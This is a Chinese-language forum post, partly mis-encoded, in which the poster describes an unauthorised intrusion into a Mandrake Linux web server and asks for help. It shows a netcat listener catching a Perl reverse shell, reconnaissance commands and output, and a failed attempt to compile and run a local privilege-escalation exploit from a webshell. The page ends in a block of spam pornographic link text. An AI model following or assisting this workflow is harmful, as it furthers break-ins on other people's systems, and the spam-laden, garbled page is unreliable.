<dfn id="is4kg"></dfn>
  • <ul id="is4kg"></ul>
  • <abbr id="is4kg"></abbr>
  • <ul id="is4kg"></ul>
    <bdo id="is4kg"></bdo>

    曙海教育集團(tuán)論壇Linux專區(qū)Linux技術(shù)討論區(qū) → 奇怪的Linux權(quán)限問題


      共有6277人關(guān)注過本帖樹形打印

    主題:奇怪的Linux權(quán)限問題

    美女呀,離線,留言給我吧!
    wangxinxin
      1樓 個(gè)性首頁 | 博客 | 信息 | 搜索 | 郵箱 | 主頁 | UC


    加好友 發(fā)短信
    等級:青蜂俠 帖子:1393 積分:14038 威望:0 精華:0 注冊:2010-11-12 11:08:23
    奇怪的Linux權(quán)限問題  發(fā)帖心情 Post By:2010-11-15 9:18:42


    最近在入侵一臺Linux主機(jī)時(shí)遇到了一個(gè)奇怪的權(quán)限問題,請大家指教一下.
    目前的權(quán)限是有一個(gè)webshell,下面是我用perl反向連接的shell得到的結(jié)果:
    引用:
    C:\Documents and Settings\Administrator>nc -vv -l -p 1234
    listening on [any] 1234 ...
    x.x.x.x: inverse host lookup failed: h_errno 11004: NO_DATA
    connect to [x.x.x.x] from (UNKNOWN) [y.y.y.y] 54409: NO_DATA
    Enjoy the Shell.
    bash: no job control in this shell
    bash-2.05b $id
    uid=72(apache) gid=72(apache) groups=72(apache)
    bash-2.05b$ uname -a
    Linux flyfool 2.4.21-0.13mdksecure #1 SMP Fri Mar 14 14:10:36 EST 2003 i686 unknown unknown GNU/Linux
    bash-2.05b$ cat /etc/redhat-release
    Mandrake Linux release 9.1 (Bamboo) for i586
    bash-2.05b$ pwd
    /var/www/html/xoop/html
    bash-2.05b$ gcc e.c -o e
    e.c: In function `check_vma_flags&#39;:
    e.c:545: warning: deprecated use of label at end of compound statement
    e.c:905:2: warning: no newline at end of file
    bash-2.05b$ ./e
    bash: ./e: Permission denied
    bash-2.05b$ ls -l e
    -rwxr-xr-x   1 apache  apache    26131 May 10 20:16 e
    bash-2.05b$ ls -l a.pl
    -rwxr-xr-x   1 apache  apache      34 May 10 19:13 a.pl
    bash-2.05b$ cat a.pl
    #!/usr/bin/perl
    print "test\n";
    bash-2.05b$ ./a.pl
    : bad interpreter: Permission denied
    bash-2.05b$ perl a.pl
    test
    bash-2.05b$
    其中e.c是一個(gè)exploit,能夠編譯,運(yùn)行卻說Permission denied,但他的確有執(zhí)行權(quán)限.
    難道是禁用了某些系統(tǒng)調(diào)用?不過我又寫了個(gè)c語言的helloworld都沒有權(quán)限執(zhí)行.
    a.pl只是測試用的,為什么./a.pl不能執(zhí)行,而perl a.pl卻可以?
    在webshell上運(yùn)行反彈程序的時(shí)候也是只能用perl name.pl

    然后我想看看開了什么端口:
    引用:
    bash-2.05b$ netstat -ant
    /proc/net/tcp: Permission denied
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address        Foreign Address      State
    bash-2.05b$ cd /proc
    bash-2.05b$ ls -l
    total 0
    dr-x------   3 apache  apache       0 May 10 20:24 13624
    dr-x------   3 apache  apache       0 May 10 20:24 16285
    dr-x------   3 apache  apache       0 May 10 20:24 16586
    dr-x------   3 apache  apache       0 May 10 20:24 21445
    dr-x------   3 apache  apache       0 May 10 20:24 25574
    dr-x------   3 apache  apache       0 May 10 20:24 28583
    dr-x------   3 apache  apache       0 May 10 20:24 29522
    dr-x------   3 apache  apache       0 May 10 20:24 31649
    dr-x------   3 apache  apache       0 May 10 20:24 32003
    dr-x------   3 apache  apache       0 May 10 20:24 5371
    dr-x------   3 apache  apache       0 May 10 20:24 5405
    dr-x------   3 apache  apache       0 May 10 20:24 6910
    dr-x------   3 apache  apache       0 May 10 20:24 8060
    dr-xr-xr-x  10 root    root        0 Mar 19 16:12 acpi
    dr-x------   4 root    root        0 Mar 19 16:11 bus
    -r--------   1 root    root        0 May 10 20:24 cmdline
    -r--------   1 root    root        0 May 10 20:24 cpuinfo
    -r--------   1 root    root        0 May 10 20:24 devices
    -r--------   1 root    root        0 May 10 20:24 dma
    dr-xr-xr-x   2 root    root        0 May 10 20:24 driver
    -r--r--r--   1 root    root        0 May 10 20:24 e820info
    -r--r--r--   1 root    root        0 May 10 20:24 execdomains
    -r--r--r--   1 root    root        0 May 10 20:24 fb
    -r--r--r--   1 root    root        0 May 10 20:24 filesystems
    dr-xr-xr-x   2 root    root        0 May 10 20:24 fs
    dr-xr-xr-x   4 root    root        0 May 10 20:24 ide
    -r--------   1 root    root        0 May 10 20:24 interrupts
    -r--------   1 root    root        0 May 10 20:24 iomem
    -r--------   1 root    root        0 May 10 20:24 ioports
    dr-xr-xr-x  18 root    root        0 May 10 20:24 irq
    -r--------   1 root    root        0 Mar 19 16:12 kmsg
    -r--------   1 root    root        0 May 10 20:24 ksyms
    -r--r--r--   1 root    root        0 May 10 20:24 loadavg
    -r--r--r--   1 root    root        0 May 10 20:24 locks
    -r--r--r--   1 root    root        0 May 10 20:24 mdstat
    -r--r--r--   1 root    root        0 May 10 20:24 meminfo
    -r--r--r--   1 root    root        0 May 10 20:24 misc
    -r--------   1 root    root        0 May 10 20:24 modules
    lrwxrwxrwx   1 root    root        11 May 10 20:24 mounts -> self/mounts
    -rw-r--r--   1 root    root        66 May 10 20:24 mtrr
    dr-x------   5 root    root        0 May 10 20:24 net
    -r--r--r--   1 root    root        0 May 10 20:24 partitions
    -r--------   1 root    root        0 May 10 20:24 pci
    lrwxrwxrwx   1 root    root        64 Mar 19 16:11 self -> 29522
    -r--------   1 root    root        0 May 10 20:24 slabinfo
    -r--r--r--   1 root    root        0 May 10 20:24 stat
    -r--r--r--   1 root    root        0 May 10 20:24 swaps
    dr-x------  11 root    root        0 May 10 20:24 sys
    dr-xr-xr-x   2 root    root        0 May 10 20:24 sysvipc
    dr-xr-xr-x   4 root    root        0 May 10 20:24 tty
    -r--r--r--   1 root    root        0 May 10 20:24 uptime
    -r--r--r--   1 root    root        0 May 10 20:24 version
    bash-2.05b$
    好變態(tài),端口都不能看,/proc下很多文件都是root只讀.

    開始我以為是我所在的分區(qū)被設(shè)置了noexec,但是:
    引用:
    bash-2.05b$ mount -l
    /dev/hda1 on / type ext3 (rw) []
    none on /proc type proc (rw)
    none on /proc/bus/usb type usbdevfs (rw)
    none on /dev/pts type devpts (rw,mode=0620)
    /dev/hda6 on /home type ext3 (rw) []
    /dev/hda7 on /var type ext3 (rw) []
    bash-2.05b$ cat /etc/fstab
    /dev/hda1 / ext3 defaults 1 1
    none /dev/pts devpts mode=0620 0 0
    /dev/hda6 /home ext3 defaults 1 2
    /dev/hdc /mnt/cdrom auto user,iocharset=gb2312,codepage=936,noauto,ro,exec 0 0
    /dev/fd0 /mnt/floppy auto user,iocharset=gb2312,sync,codepage=936,noauto,exec 0 0
    none /proc proc defaults 0 0
    /dev/hda7 /var ext3 defaults 1 2
    /dev/hda5 swap swap defaults 0 0
    bash-2.05b$

    支持(0中立(0反對(0單帖管理 | 引用 | 回復(fù) 回到頂部

    返回版面帖子列表

    奇怪的Linux權(quán)限問題








    簽名
    主站蜘蛛池模板: 亚洲国产夜色在线观看| 国产成人a毛片在线| 久久九色综合九色99伊人| 欧美最猛性xxxx高清| 国产一级生活片| 777四色米奇欧美影院| 好大好硬使劲脔我爽视频| 乌克兰大白屁股| 欧美日韩在线视频| 啊灬啊灬啊灬快灬深高潮了 | 午夜免费福利网站| 黄色一级电影免费| 在线视频日韩精品| 久久天天躁狠狠躁夜夜躁2020| 福利国产微拍广场一区视频在线| 国内一级特黄女人精品毛片 | 黄色91香蕉视频| 大桥久未无码吹潮在线观看| 久久久噜噜噜www成人网| 欧美中文在线视频| 免费看国产一级特黄aa大片| 色五月在线视频| 国产精品99久久久久久人| heyzo北条麻妃久久| 性xxxxfreexxxxx喷水欧美| 久久精品国产精品亚洲精品| 欧美一级高清片在线| 健硕粗大猛烈浓精| 精品国产午夜肉伦伦影院| 国产在线精品一区二区中文| 2020精品国产自在现线看| 国模gogo大胆高清网站女模| 一级欧美一级日韩片| 成年女人喷潮毛片免费播放| 久激情内射婷内射蜜桃| 欧美yw精品日本国产精品| 亚洲视频在线一区二区| 狼群社区视频免费下载观看| 四虎国产精品成人免费久久| 色婷婷精品大在线视频| 国产无套粉嫩白浆在线观看|